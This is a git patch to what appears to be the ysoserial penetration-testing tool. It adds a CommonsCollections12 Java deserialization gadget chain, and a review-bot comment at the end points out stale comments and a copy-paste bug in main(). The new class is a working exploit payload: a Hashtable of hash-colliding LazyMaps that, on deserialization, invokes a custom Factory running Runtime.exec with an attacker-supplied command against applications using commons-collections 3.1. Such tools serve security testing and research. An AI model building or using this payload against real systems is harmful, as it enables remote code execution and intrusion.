From c6727657f7cf37030984fd8f9870aa65c3acc0a9 Mon Sep 17 00:00:00 2001
From: rootphantomer
Date: Thu, 20 Oct 2022 10:51:02 +0800
Subject: [PATCH] =?UTF-8?q?CommonsCollections7=20done=EF=BC=8Cadd=20Common?= =?UTF-8?q?sCollections12?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../payloads/CommonsCollections12.java | 88 +++++++++++++++++++
 .../payloads/CommonsCollections7.java | 1 +
 2 files changed, 89 insertions(+)
 create mode 100644 src/main/java/ysoserial/payloads/CommonsCollections12.java
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections12.java b/src/main/java/ysoserial/payloads/CommonsCollections12.java
new file mode 100644
index 00000000..7af6c548
--- /dev/null
+++ b/src/main/java/ysoserial/payloads/CommonsCollections12.java
@@ -0,0 +1,88 @@
+package ysoserial.payloads;
+
+import org.apache.commons.collections.Factory;
+import org.apache.commons.collections.map.LazyMap;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.PayloadRunner;
+
+import java.io.IOException;
+import java.io.Serializable;
+import java.util.HashMap;
+import java.util.Hashtable;
+import java.util.Map;
+
+/*
+ Payload method chain:
+
+ java.util.Hashtable.readObject
+ java.util.Hashtable.reconstitutionPut
+ org.apache.commons.collections.map.AbstractMapDecorator.equals
+ java.util.AbstractMap.equals
+ org.apache.commons.collections.map.LazyMap.get
+ NewFactory.create
+ java.lang.Runtime.exec
+*/
+
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-collections:commons-collections:3.1"})
+@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})
+
+public class CommonsCollections12 extends PayloadRunner implements ObjectPayload {
+
+ public Hashtable getObject(final String command) throws Exception {
+
+ // Reusing transformer chain and LazyMap gadgets from previous payloads
+ final String[] execArgs = new String[]{command};
+
+
+ Map innerMap1 = new HashMap();
+ Map innerMap2 = new HashMap();
+
+ // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
+ NewFactory newFactory = new NewFactory(execArgs);
+
+ Map lazyMap1 = LazyMap.decorate(innerMap1, newFactory);
+ lazyMap1.put("yy", 1);
+
+ Map lazyMap2 = LazyMap.decorate(innerMap2, newFactory);
+ lazyMap2.put("zZ", 1);
+
+ // Use the colliding Maps as keys in Hashtable
+ Hashtable hashtable = new Hashtable();
+ hashtable.put(lazyMap1, 1);
+ hashtable.put(lazyMap2, 2);
+
+
+ // Needed to ensure hash collision after previous manipulations
+ lazyMap2.remove("yy");
+
+ return hashtable;
+ }
+
+ public static void main(final String[] args) throws Exception {
+ PayloadRunner.run(CommonsCollections7.class, args);
+ }
+
+ static class NewFactory implements Serializable, Factory {
+
+ private final String[] execArgs;
+
+ public NewFactory(final String[] execArgs) {
+ this.execArgs = execArgs;
+ }
+
+ @Override
+ public Object create() {
+// exploit
+ try {
+ if (this.execArgs != null) {
+ Runtime.getRuntime().exec(this.execArgs);
+ }
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ return null;
+ }
+ }
+}
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections7.java b/src/main/java/ysoserial/payloads/CommonsCollections7.java
index dd1cd689..97072a7d 100644
--- a/src/main/java/ysoserial/payloads/CommonsCollections7.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections7.java
@@ -39,6 +39,7 @@ public class CommonsCollections7 extends PayloadRunner implements ObjectPayload {
 public Hashtable getObject(final String command) throws Exception {
+// transformerChain 改写成factory,详见CC12
 // Reusing transformer chain and LazyMap gadgets from previous payloads
 final String[] execArgs = new String[]{command};
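Review bot: The comment `// Reusing transformer chain and LazyMap gadgets from previous payloads` at the top of getObject no longer describes the code under it: nothing in this hunk builds a transformer chain, the LazyMap factory is the new `NewFactory` class, and the `// exploit` comment inside create() sits at column 0 and adds nothing. Replace the first with `// Same Hashtable/LazyMap hash-collision layout as CommonsCollections7; the transformer chain is replaced by NewFactory` and drop the second. main() passes `CommonsCollections7.class` to `PayloadRunner.run`, which looks like a copy-paste leftover from the file this was derived from; `PayloadRunner.run(CommonsCollections12.class, args);` is presumably what was meant. The `@Authors` list also appears carried over from CommonsCollections7 rather than naming this commit's author, and the method-chain header comment should be kept in step with the code since it is the one place that records the call path readers and detection rules are meant to match.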